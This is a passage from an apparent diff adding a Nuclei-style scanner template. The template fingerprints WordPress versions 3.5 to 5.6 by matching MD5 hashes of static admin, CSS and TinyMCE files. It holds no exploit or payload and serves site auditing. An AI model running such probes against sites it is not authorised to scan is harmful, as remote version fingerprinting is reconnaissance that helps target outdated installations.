"(\"c4a664eec9fe972ffa4f58a9932a6ba1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"17c1c548cb9f35ba6c1eaa48ee95ccb7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"bb06b01380b31741cc3c6bb0475fa15e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dea7394c000c199f8d9d89d19e4c7ab4\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"bae9b3c21bbed3ac23a9f2ed67352c25\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"d990a5a8ca17c099a994cce6fc99a63e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"6a1e4023a877503c50771b02f2d332c2\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"61e1a5c632622df1af36a7a51ac4f53f\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"62c815e5f66e17e046de2817a1af9f93\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"965a6c8c3c3e7df5310416a86ac60eb2\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9eacd99637638c1827a085823204b32a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"8d2bdb3746a32cf6584131f1cf8862e9\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"ec11a68b00ee850bd0b91ae99d11c0b3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c3bf88f3c7cdb2017fef61ed1bd09a50\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c55941aa864653e8b3de814015477f61\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b37c7bd0f42bb0a077cdb5b5c8e15ec1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9f3731a955a2d8b3a31350a427b33898\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"fc08122eeaee48c3b094db0a1a249c25\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"a4f0e2f9a98726f3451c112c4a748650\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bdb82a2554a8e05100eee4f970368d75\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"63cd350aa533120f942fb6817e1b8742\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a845b846f7528f379cbfd59cbdc679f0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"0cc751acbd9d40cfe25f0a5520899326\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"49e447a9a0db3e5863d67226c76d8168\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"aafed3503241acd9e063d0f22b8aaddf\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"e16e4c79756636ad6fb531df4c666a4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"4c2c339725d1719abe9809b79e89d390\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7f96038b9537a8fe2a8887a4a4893737\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1f3b6b178975e8714428fb922fb7522a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c9065688eeaa24604f824846ae4210fa\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"a80ddc28df4b919043da8a96106b1661\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"c66c6985d272f6f4a4dfc947b8a132ed\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"864ec11903d550ceea82e36ba4396a26\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"c6422380faa3101cb73ccccbdefab150\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"de756f5669035c3590ed9d4da7773a72\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"08807467493793aa5fc03fcd3cae128c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"95405e5d6077252bee8a3e9e84d10580\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3198ef3ad593013cf4756fe386035642\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"3903fb387a3c849e3369c0a2095706a7\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"ecab48a35fecb8b065c069c1ca5f9084\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"b2afc744816a8319329b934ecf6051b0\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"6111294391a90e6a53ec6c367125d532\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4512074a55d94d3becd197a007e3fe19\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1e5ae890a49af4d069a4f732d85b1de3\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"ff964251f91913de2c95d166fa9f910d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"96c9eb1807f5271e0e1a1b279f738b78\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8581d6918e5aec966962ff88b92b7515\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"6f85716a47597c040d5549bbd61ff927\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1a67509c005453afa0cd06dbe22937a7\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"55cda4394e062bb9e6c5dfe7565a83fb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"111154e25e5c8143f4e20a6e80b8a755\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"d148388c28a8d4c3b25b4c669849067f\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"36a186d038c83593e79d1a0cc8876bc4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9fd24eac5fad7af9e94d352633d54b33\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"10d404c76bf37fd787385e5d896247f1\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"13f22ddd59ffbf4d41b6c2dede462d9b\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"8e32de701588a0be6c747cb7ae197c8d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"d5678d078044d2a8f86cc3a6606ef1cf\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"a4e0dd8fcafad10276caad5790a642fe\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"8864a06ee8c86c6c1921c90583616c83\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"112366dc16e2df4d5b1aba549817daeb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/ectoplasm/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"3c121862a0ba5b3bd489d428cc926624\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"435a0d93eeca88b2d78d085931d35c2b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"86d2fb3ee504d7846bc973f0bad27fad\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"dea6294c84c0d202c84e256b1693da9d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"d392ab4aa1d7ba0fc2c7538e62b30448\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"22727a1ae25ad30d8dfce6cb130e58da\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"c6e030f06fac0338cb5b9e5ddb9e5ff2\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c45bf2fc4b5a7acedf6e45aa1470c3e4\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"23305501a9d59a48c6e715a84624bad3\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"fc7c114669f52b57e6ba46c66dfd1525\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f66fb1ef1527ce106614d6e75045b7cb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c5783608b75e6c0d2471d588dd6bb508\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"dcfa49b5d519db45ec284e6ea7049fc1\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"ce04388f7af80c6a43b3c259792dd813\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"45acce186fc7ed6edf6a836f996f2c75\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"72046a12cb11f7721bcb3a628cb980a1\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4c84116c8b3a99ae8ae04d6ed5898931\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"089347821c45845393ce4abc0dff439f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"f867fd7adccd1ecdf764739053a6ec2a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"663ac9c63302bc5276bbab270f1c0424\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"633688047d2552c2036369c8df1e9dfe\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"865c41c44ac51f501ee2fe2307950b26\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fc48153c9c53bf2d871067cbfca6c8c4\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"eb4cd2c841fb222e136b5e7b891aea12\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"768a93266f3c54b24f0bb06f4fde09c1\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"2d464c6a8cd405d1fa8671f1a4d1f068\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"2e8fd5fd620c08c18f382baaf820c219\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"4ed4244ba484a49d295fa48d29957533\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a28c37418e809a0ece5656740522adcb\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"592d60de5e62336b3958d4975b39a9b4\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"900a4b2dca39d52e01e5138aa5dacc32\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"a7cdb166af4da3afc9665deda6861f0c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"610bf6b6680e2318c777cbfa5b0fe613\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"bd4405a8496e1b998699be2712184241\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"4dd2798490887d9026d44f2bea822fe1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3a7cb6aeafb59c79c618e00078a42df7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/coffee/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"a585d4eb32332d90b23f792312bc4d8a\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"98fb96ff87f6948275e2acd843db28ad\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"68cf9b8927067500035c727ed340fea1\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"16ae38eb245d0aa76cfa9428044afcc9\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c8796229a84fa15d28de61c772a0d67a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e2f1b66e798b73956910c7f2d8f52893\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"2fe17baa6ece60bce123d487f4e528e7\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a355c6b1db46c2bc2676b24171585813\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"f085870c70630c872c3d92792417ff73\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"af368ebb8350419c26769db1ab139778\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5c2e0a8064d1714f511c0b1ff36cf592\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"395a6f36dbe8b376727438dbe52ced3e\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"7ff2e69433e8d79b333826ab10b4cbe4\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"a43eea2612ccc7873ff1394e940acf93\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"3053c3f6ef0a6dbf7e72b9329b54412c\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4182df9ec161b300cf221e37d3a3dddf\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"2b83cfa858228147b6ec893e079e4c95\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"7e639ed3a2651581aa26e0c4f67f497c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"d76e3f993f962326e6a2336db75d3fd6\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"0c54b9433982ac1434c48071143bc050\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"fe0277eddd6929335c49e93666773745\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ae72be7c678881355fa484ebb34f76bf\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a3ef984189150a8810a060747213016b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8564e463d51205a7ba81fc3dbf47534c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"715d5354e62c3137906fa6f108e3f09c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9f99945db6de77cbea0b45d8152bacd7\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"14f3c0690120de73693ff29bcecc80d6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"760a83d1bd8de7952c213a668151bce6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"41f278bf580d299962fb0228d5b3c789\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e7fbcea7585a697767b2615aadc4c414\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"30a856e5af5b41d6a2799e262b3f9a24\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"f8b5aa839f60572eb185cd1d148e0875\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"5f63b36275e6d513b4b798700f721a2a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0e9f1d4a2fa8f8a7ae62a302e0fd2869\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"c9d0a313c14133dae9c0e10a6b85e6b2\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"f234606ce89828be50f39b60ef02995e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e6ed4125ccd101db2623aa046b627e1a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/blue/colors.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"835228f437b76cb4336fd2db1841a984\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"fb4d3e2f7fe955aea70becac4602f87f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dd77d909ddd0981a03cd1bcb90d2a56a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b05bd2b90583cd670ef66e4fbd08c12e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"998f2d1f4b8565cb04f4c28a3a38b611\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"09ba9aa3753dfc6aaa747e46172d7f0c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.26 + dsl: + - "(\"bff3966d07076edaf48befe021c4112b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d0afb2116a3269ab63042023468df1ec\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.30 + dsl: + - "(\"96d22d6d37853b50c7cfab8dd7aa37e8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"58b52e0c8528d52e040b8355a02eee77\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9871ee227143cdee76b565c2ce1c23f5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"476bd860a10099a51548fabfd11ac23a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f76dbe0a0a5fb610dd13cce233ed9108\" == md5(body))" + - type: dsl + name: 4.0.27 - 4.0.32 + dsl: + - "(\"cccef716d8a07781c8730efeaa4955d6\" == md5(body))" + - type: dsl + name: 3.8.31 - 3.8.35 + dsl: + - "(\"fc23b2d4a231aba890926986f716ad05\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e99f9ad98677585817cb3ed25b652b58\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"cb3ad1540b2fc42920d8be3f0b64609c\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"7a6af6bc5f5ebaa62ea4024bda139a0e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3584a97822fec470bd8afd83efdd3d56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/_admin.scss" + matchers: + - type: dsl + name: 4.8 - 5.0.11 + dsl: + - "(\"c22ff1bb2db45ee3879ba234761ba618\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"bd2094e9dc3209e839476eba00ff5838\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"337df7168a4b60669c23c4b0343d72a8\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"9f7fb552eed012f6ea9ef1807ccf2e60\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"073d4e2e9dce085364cba7b11dcafa8b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"a3dbce149457e880a29693684cecd425\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"8be2b9d1eeaaeb053236de49c0b3efcd\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"8ad8833b60497ab34c3df89ca124785d\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1cd09416a8c94906605e085b32a00d20\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"bfb602edbb43601f02ce23ae875d3976\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5d6d79bf1a1df7daffd0f4f5844cebb9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7314d06c13a9db49cb81aadf88441ce7\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"a9e98570b0d4b719f968de907dbebc1e\" == md5(body))" + - type: dsl + name: 5.3.2 - 5.4.4 + dsl: + - "(\"4d7f7857bc064daeb85cad30ff0feeab\" == md5(body))" + - type: dsl + name: 5.3.1 + dsl: + - "(\"91253f7e866f844f0bd47a0630a3d30f\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"a8720b36ac7c97fe0d3fee37b081c316\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/modern/theme.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"75c97923eb04944e60b3659633f6fc8f\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"020976230a9fcdc90ebc06144dcb9865\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"e3b7cec28cad5caa5fcbcc2a15cebae7\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"d078eb835693e2b90baa5522cc807ec1\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"506dd1713e3fc6ed3de0c00867c4dfaa\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"73e129875cecb80849c9d37a223e48b6\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"a9c521859ff01e0528336828800db2cf\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"d0d8223ac24917740b2f0f2423bf3410\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"564c5df5e7f98ae88d546732251aeab2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"2ad1417fd25d61b5feb5e18cd3be2494\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"03e3c162d0ca7ec600d185c193234660\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"5eaa758e147eb8c84507d2671cb0eb3a\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"7a36834309f0b8ef510bccb53d832943\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"af3b295e3eed46ece77323d00021090b\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"6ffeeca19829c98e1da5d5496fe415db\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"ee75ddd3e6a9b205b105d05e9dac72d1\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"558edbf6c845c9c87cd268285a0666b3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/modern/theme.js" + matchers: + - type: dsl + name: 4.8 - 4.9.5 + dsl: + - "(\"caacfdd9b26dbae208eef5381e753eea\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e873cd5a3ac205304d4f48b8d106aa35\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"d502a6ac28bb48a7d91a89ba9b5710c0\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"0de9115a54b3867ca975c9f1bff8225c\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"48e1bb77c2ec2cdbb321e12a95fdf425\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3da8f8fb91d3c79f2cd499944aa42737\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"7b4a867a84575f7d26a9377b1eae7cbf\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"76569bb2afef83f696d146f1515d7308\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3cda8e27d12c73c9046250803b1153e0\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"2f8cf087f0fd2648120054fde841f7cb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"997db40f21c0f2249e96aad261d2db65\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"fb330860e2aff1f458e129ba84ea1fbb\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"0cd9fdee0a27d28e107936ef56e4e24f\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"0e50bcfc23e66938c5585ce303105cf2\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"94a15198144af9962df61ed927e23f1b\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"148b19d02f928ae66fed91adb39f66c9\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"efb528339d6fde55ea32c59d558a3299\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/plugin.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"a649bd59c1d607b782a38ab372f20ca3\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"38d2137a5518e2bc7a88b4bf35c4ffca\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"69a65927466dab834f5d48c28c8c23bb\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"64239ce0c6d44c0eaf09e6fd5ba672c2\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"733e85bf06990e86e4892d75759eae1b\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"1d72974d4431f1558f0be213ecf4b3f6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6ad28c2bb29efea8d198bab7e5354439\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"d41da4c3b9d07e54055ad9ab13b9112b\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"4bcf636bad04e64f10be7003828c210e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f0293e817c1dae4b042a1a1d6248b007\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"720418167ced7d4e1633fb64ba3d390f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"dadc44587098d38d2ad483eb1d828212\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b48d16a6a96856b9d1404cdef5240187\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"3986deb1875d68d2ddc2ca9480c43467\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"190f98d73b8e7550e7ec69370bf48b6b\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"1216bf3c90d1540a8d29e04f6f9bb7b2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"145af6e3a2d9bfaf7010373f2ba3d835\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"079d5fa2e5111e6f0a10ed6cbf7d9b80\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6bd86bdfb5a42cb4d94163433ba74269\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"645805aedb03bd9f95a5f37ad286d6ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"321d572f5f98e1c84a6ec1775dc3ee69\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"89dcd2e2ea2dd86abe9c00761b806a9c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"6a65f345c92e1b3b2c52e323a739a03f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"695f70d7e94e32459d78ab796a88ab4b\" == 